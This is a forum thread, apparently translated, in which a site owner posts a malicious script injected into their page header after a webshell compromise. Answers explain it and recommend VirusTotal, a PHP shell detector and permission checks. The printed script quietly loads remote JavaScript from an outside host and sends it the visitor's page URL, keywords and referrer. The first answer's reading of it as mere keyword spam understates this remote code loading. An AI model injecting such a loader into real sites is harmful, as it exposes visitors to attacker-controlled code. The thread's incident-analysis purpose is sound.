Recently my site was hacked, the attackers managed to upload a webshell to the site, however everything has been controlled and the site is safe again.
Now eset nod32 detected a trojan for me fakejquery, investigating a little I could see that the following script has been inserted in the header of the page:
<script>
var a = '';
setTimeout(1);
function setCookie(a, b, c) {
var d = new Date;
d.setTime(d.getTime() + 60 * c * 60 * 1e3);
var e = "expires=" + d.toUTCString();
document.cookie = a + "=" + b + "; " + e
}
function getCookie(a) {
for (var b = a + "=", c = document.cookie.split(";"), d = 0; d < c
.length; d++) {
for (var e = c[d];
" " == e.charAt(0);) e = e.substring(1);
if (0 == e.indexOf(b)) return e.substring(b.length, e.length)
}
return null
}
null == getCookie("__cfgoid") && (setCookie("__cfgoid", 1, 1), 1 ==
getCookie("__cfgoid") && (setCookie("__cfgoid", 2, 1), document.write(
'<script type="text/javascript" src="' +
'http://crazytime.home.pl/js/jquery.min.php' + '?key=b64' +
'&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host +
'&utm_medium=' + '&utm_content=' + window.location +
'&utm_term=' + encodeURIComponent(
((k = (function() {
var keywords = '';
var metas = document.getElementsByTagName('meta');
if (metas) {
for (var x = 0, y = metas.length; x < y; x++) {
if (metas[x].name.toLowerCase() == "keywords") {
keywords += metas[x].content;
}
}
}
return keywords !== '' ? keywords : null;
})()) == null ? (v = window.location.search.match(
/utm_term=([^&]+)/)) == null ? (t = document.title) == null ?
'' : t : v[1] : k)) + '&se_referrer=' + encodeURIComponent(
document.referrer) + '"><' + '/script>')));
</script>
From what I understand the above script is generating traffic to an external site.
I've already removed all this code from the site, but I'm left wondering what this code actually does.
My question is: Am I correct in thinking that traffic is being generated to an external site, or does the code shared above do something additional?
You have been a victim of Black Hat SEO and I think more specifically the Spamming Keywords technique that consists of filling the content of a website with keywords spamming said content. This is also known as keyword stuffing or spamdexing .
All these techniques aim to alter the ranking of the site in the search engines and this is a double-edged sword as the search engines have tools to detect such spam and can remove your page from the ranking as a consequence.
This part
You are creating a script that will try to load an external page and you are using the keywords and even the title of your own page to pass them as parameters in the query
This snippet proves it.
It is also reading the referrer of your page and is sending it
Lastly and most importantly, you are saving cookies("__cfgoid") in the browsers of the people who use your site.
I recommend that, now that you have contained the threat, you write your other script to clean said cookie.
Use this: http://virustotal.com It will help you scan for malicious files and URLs that you think are malware or unsafe things.
The funny thing is that the URL has already been parsed, initially it has thrown me:
However when parsing again:
Result:
https://virustotal.com/en/url/50464e88f0c2600be82edb631148a37660856f4ddae633de110dc3d6fdc43266/analysis/1476743278/
Now, on the other hand, in the public_html have this utility handy: https://github.com/emposha/PHP-Shell-Detector
The attack you suffered is that they uploaded a PHP file and send the traffic of your website to advertising third parties or others, what I recommend is that you check all the permissions of the folders on your server to verify that any folder is with writing service , that they are uploading files there, and from there they carry out the attack, it happened to me once about hacking facebook without programs and well I had to check all the permissions of my server. And if I had problems with permissions, that's why I tell you to start there.